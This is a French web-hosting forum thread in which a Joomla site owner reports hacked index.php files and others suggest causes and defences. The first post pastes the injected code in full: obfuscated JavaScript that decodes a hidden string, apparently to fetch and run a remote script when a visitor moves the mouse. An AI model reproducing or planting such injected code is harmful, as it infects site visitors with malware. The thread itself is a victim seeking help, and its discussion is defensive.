index.php piraté

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] index.php piraté

    Hier soir, mes 4 sites (tous Joomla) sont devenus inaccessibles. Un ami a découvert que tous les fichiers index.php (de l'admin) avaient été falsifiés (lui aussi avait 2 sites Joomla qui avaient eu le même sort) ...
    Voici la partie falsifiée de l'index :
    require_once JPATH_BASE.'/includes/framework.php';

    // Mark afterLoad in the profiler.
    JDEBUG ? $_PROFILER->mark('afterLoad') : null;

    // Instantiate the application.
    $app = JFactory::getApplication('site');

    // Initialise the application.
    $app->initialise();

    // Mark afterIntialise in the profiler.
    JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

    // Route the application.
    $app->route();

    // Mark afterRoute in the profiler.
    JDEBUG ? $_PROFILER->mark('afterRoute') : null;

    // Dispatch the application.
    $app->dispatch();

    // Mark afterDispatch in the profiler.
    JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

    // Render the application.
    $app->render();

    // Mark afterRender in the profiler.
    JDEBUG ? $_PROFILER->mark('afterRender') : null;

    // Return the response.
    echo $app;
    <div id="w3stats"></div>
    <script language="JavaScript" type="text/javascript">
    window.w3ssss=function(){
    var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauo gkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfg pe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0f owyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi 9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g% 3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6 r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6f ht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5m ph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn 8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0yg t3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0A cj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m 9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rp h%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9i ga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu 7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba";
    var visitnum=window.history.length%1000-window.history.length+4;
    var countbox=document.createElement("div");countbox.id ='countbox';
    idarr = new Array(97,114,93,104);
    for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);}
    var cont=''; currentuser=true, nextuser=countbox.firstChild;
    do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuse r!==countbox.lastChild)
    var userref=unescape(scriptlink.substr(scriptlink.inde xOf('?userrefer=')+11));
    for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);}
    try{ window[cont](content) }catch(e){}
    }
    window.CheckBody = function()
    {
    if (!document.body){setTimeout('CheckBody();',10);}
    else
    {
    window.nomore=false;
    document.body.onmouseover=function(){if(!window.no more){window.nomore=true;w3ssss();}}
    window.onmouseover=function(){if(!window.nomore){w indow.nomore=true;w3ssss();}}
    }
    }
    CheckBody();
    </script>
    Peut-on éviter ce genre de désagrément et surtout comment?

  • #2
    Re : index.php piraté

    Bonsoir

    Déjà installer CrawlTrack et CrawlProtect cela peux aider :
    CrawlProtect est un script php open-source capable protéger votre site de la plupart des attaques


    A+

    Commentaire


    • #3
      Re : index.php piraté

      [modo]Sujet déplacé en Sécurité[/modo]
      90% de ces problèmes proviennent de composants "avec failles" (voir http://docs.joomla.org/Vulnerable_Extensions_List )
      Une autre piste est un logiciel FTP local infecté (transmet les accès à un pirate).
      Pas de demande de support par MP.
      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

      Commentaire


      • #4
        Re : index.php piraté

        J'ai bien examiné cette liste de failles et je n'ai rien trouvé de probant. J'ai installé CKeditor sur un site mais je suppose qu'il n'a rien à voir avec FCKeditor?
        Reste la piste du FTP (ce qui expliquerait l'infection des 4 sites) ?
        Est-ce que l'installation du "crawltrack" protégerait efficacement mon FTP ?
        Merci à vous 2

        Commentaire


        • #5
          Re : index.php piraté

          Bonjour,
          CKeditor sur un site mais je suppose qu'il n'a rien à voir avec FCKeditor?
          CKEditor est la nouvelle dénomination de FCKEditor.
          Reste la piste du FTP (ce qui expliquerait l'infection des 4 sites) ?
          Si ton client FTP est infecté, ceci expliquerait assez bien l'infection d etous tes sites. Dans ce cas, c'est ton windows et ton client FTP qu'il faut nettoyer également.
          Est-ce que l'installation du "crawltrack" protégerait efficacement mon FTP ?
          CrawlProtect et CrawlTrack sont efficaces pour ce qui concerne les attaques HTTP, mais n'ont rien à voir avec FTP, s'agissant de protocoles différents, accédant de manière différente à ton espace d'hébergement.
          Pas de demande de support par MP.
          S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

          Commentaire


          • #6
            Re : index.php piraté

            Reste la piste du FTP (ce qui expliquerait l'infection des 4 sites) ?
            Oui mais j'ai oublié de dire que les autres sites "non Joomla" n'ont subi aucune attaque... d'où cette argumentation reste peu convaincante!
            Est-ce que changer le CHMOD des index.php serait utile?
            Et le .htaccess n'est-il plus efficace?

            Commentaire


            • #7
              Re : index.php piraté

              Il reste donc la piste de l'e'xploitation d'une faille.

              Un pirate qui réussit à s'introduire par injection d'un script Perl par exemple, avec escalade des droits, se fichera complètement que le index.php soit en lecture seule, puisque ces pirates et ces scripts d'infection savent très bien manipuler les droits de fichiers, certains même ne touchant même pas le mtime du fichier.

              .htaccess n'est efficace que dans une certaine mesure, mais si l'attaquant utile une méthode exploitant par exemple une surcharge des buffers PHP (faille qui a été présente dans tous les PHP 4 et comblée uniquement avec 5.2.13), là, le .htaccess et même toute protection PHP ne sert plus à rien, l'attaquant ayant à ce moment les droits du serveur apache.
              Pas de demande de support par MP.
              S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

              Commentaire


              • #8
                Re : index.php piraté

                Ok, donc il y a probablement un composant, installé en extension (je suppose) sur mes 4 sites et qui a une faille ?
                Comme il y en a très peu, ça ne devrait pas être difficile à trouver...
                Je vais faire une liste, dès que possible

                Encore merci pour ton aide

                Commentaire

                Annonce

                Réduire
                Aucune annonce pour le moment.

                Partenaire de l'association

                Réduire

                Hébergeur Web PlanetHoster
                Travaille ...
                X